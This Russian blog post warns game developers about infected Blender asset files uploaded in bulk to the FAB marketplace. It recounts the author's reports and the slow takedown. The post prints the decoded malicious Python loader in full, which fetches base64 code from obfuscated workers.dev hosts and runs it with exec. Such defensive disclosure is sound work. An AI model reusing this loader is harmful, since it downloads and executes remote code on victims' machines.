Небольшой дисклеймер: данная статья не призвана провести всеобъемлющий анализ, это скорее статья‑предупреждение для начинающих и не только разработчиков компьютерных игр.
Данная статья расскажет о небольшом инциденте, произошедшем на маркетплейсе игровых ассетов FAB. В течение трех суток пользователь с ником AIGUL12 загрузил более тысячи зараженных ассетов, не встречая никакого сопротивления со стороны торговой площадки.
Как все начиналось
В пятницу, а это было 19 июня, я решил глянуть бесплатные ассеты на FAB. Вдруг найдется что-нибудь интересное. И сразу глаз зацепился за кучу ассетов от одного автора.
Далее насторожило оформление: всего две картинки, причем вторая — это отзеркаленная копия первой. А описание явно составляла нейросеть. Но на тот момент я думал, что это обычный нейрослоп заливают. Поэтому решил проверить и скачал ассет в формате blend.
И тут-то меня ждал сюрприз: блендер неожиданно выдал предупреждение о наличии скрипта, который я предпочел не запускать и нажал кнопку Ignore.
Как работает зловред
Но я был бы не я, если бы не полез смотреть, а что это за скрипт такой. На вид вроде скрипт как скрипт, но мое внимание привлекла длинная строка с кучей символов.
Как оказалось, это зашифрованная с помощью Base-64 строка, в которой находится вредоносный код. Первые пять символов отбрасываются, а остальное расшифровывается и выполняется с помощью инструкции exec. Эта инструкция выполняет любую переданную строку как живой код, что и позволяет вирусу запуститься прямо в операционной системе. А далее вредоносный код скачивает «полезную» нагрузку на компьютер жертвы.
Расшифрованный вредоносный код
import sysimport base64import json addon_names = [ '1$L&6YXJlbmF0aXRhbm9ubGluZQ==', '$vBUeYXJlbmF0aXRhbm9ubGluZWYxMg==', 'G88mubW91dGhydW5uYmV2YTE5ODY=', 'l%32bdmlvdGl1YmFtYTE5NzU=', 'mpWQ^ZGlhdGVudGNvdXJubzE5ODE=', 'JERMgc3BhcmthZGRvbnMyMDAyMTQ=', 't^W%Gc2hhZG93YWRkb25zMjI5MjU=', 'QT(#bZ2xpbnRhZGRvbnMxODk2', 'Q9kscZnJvc3RhZGRvbnMxODk4Nw==', 'e&o!QbmVvbmFkZG9hc25zMTk5NTg=', 'oBbQkZHVza2FkZG9zbnMyMDM5OQ==', '1l93jc3Rvcm1hZGRkb25zMTk3MzEw', '8ljKeZW1iZXJhZGZkb25zMTkxNjAx', 'RQi6abmlnaHRhZGRnb25zMTkxMjA=', 'hyn6yYmxhemVhZGQyb25zMjBkMA==', 'ne%r^Z2hvc3RhZDFvbnMxMTkyODA=', '8@r!WcmFpbmRhZDRvbnMxOTExMA==', 'yBbt7c3RhcmZhZDVvbnMyMDE0MA==', 'yW4K$dm9pZGFhNmRvbnMxOTI0MA==', 'YajNPdGh1bmRxZXI3ZGRvbnMxOTQ2MA==', ')Cax*YWRkb25zcmZ0NHVzMTk3MDA='] addon_prefix = "captcha" worker_domain = "workers.dev/get-link"max_attempts = 3 for obf_name in addon_names: clean_name = base64.b64decode(obf_name[5:]).decode('utf-8') url = f"https://{addon_prefix}.{clean_name}.{worker_domain}" attempt = 1 while attempt <= max_attempts: try: import requests response = requests.get(url, timeout=10) if response.ok: data = response.json() link = data.get("link") if link: clean_link = link[5:] decoded_code = base64.b64decode(clean_link).decode('utf-8') exec(decoded_code) print("Hi") sys.exit(0) attempt += 1 except Exception as e: print(f"Hi Hi {url} (Hi {attempt}): {e}") attempt += 1 print("Hi Hi Hi")
Попытки предупредить сообщество
Первым делом я отправил два обычных репорта на FAB: на один из ассетов и на самого автора. И получил стандартный ответ, что нарушений не найдено. Тогда я отправил обращение в техподдержку и получил такое:
Thank you for contacting Fab Support!
We appreciate your patience. The Internal team is actively investigating this concern. If you find that you are still interested in the files themselves, our internal team has a workaround for you:
Open a new/current Blender scene. Go to File > Append. Select the .blend file downloaded from Fab to open it. Go to Collections and add the Sofa Asset into your scene.
We appreciate your report.
Please let us know if you need anything further.
Thanks, The Fab Team
То есть вместо того, чтобы заблокировать автора, мне предложили воспользоваться командой Append, чтобы безопасно загрузить 3D-модель.
По итогу мне удалось разместить пару новостей об этом в сообществах ВК. Но все блогеры (что наши, что западные), которым я отправлял информацию о данном инциденте, благополучно проигнорировали меня. А на реддите мою статью об этом не пропустили автоматические фильтры.
Зараженные ассеты удалили… спустя 3 суток
К счастью, спустя три дня на реддите появилась информация о зараженных ассетах. И Epic Games наконец-то отреагировали:
Thanks for the report u/HQuasar — we’ve taken down the account, and we are removing all listings from Fab and users’ libraries.
Неутешительные выводы
Какие выводы можно сделать из этого?
Во-первых, механизмы безопасности и предварительной модерации на современных маркетплейсах серьезно дискредитированы. Если они вообще существуют. Скачивая любой чужой ассет, вы всегда должны предполагать, что внутри может находиться вирус. И не важно, официальная это площадка или телеграмм-канал, раздающие бесплатные платные ассеты.
И дело не ограничивается площадкой FAB. На площадке Artstation пользователь ARARAT раздает точно такие же ассеты, только за 1 доллар. И явно не первый день.
Во-вторых, надо понимать, что заражены могут быть не только blend-файлы. Опасность может исходить и от плагинов Unreal engine, и пакетов unity, и файлов других 3D-программ. Кроме того, под сомнением и новая система «Get Extensions» в Blender. Когда вы нажимаете кнопку Install, Blender скачивает архив и выполняет заложенный в расширение Python-код.
Будьте бдительны и помните: в современном геймдеве фраза «я просто скачал модельку» может стоить вам потери всего проекта.
ссылка на оригинал статьи https://habr.com/ru/articles/1051022/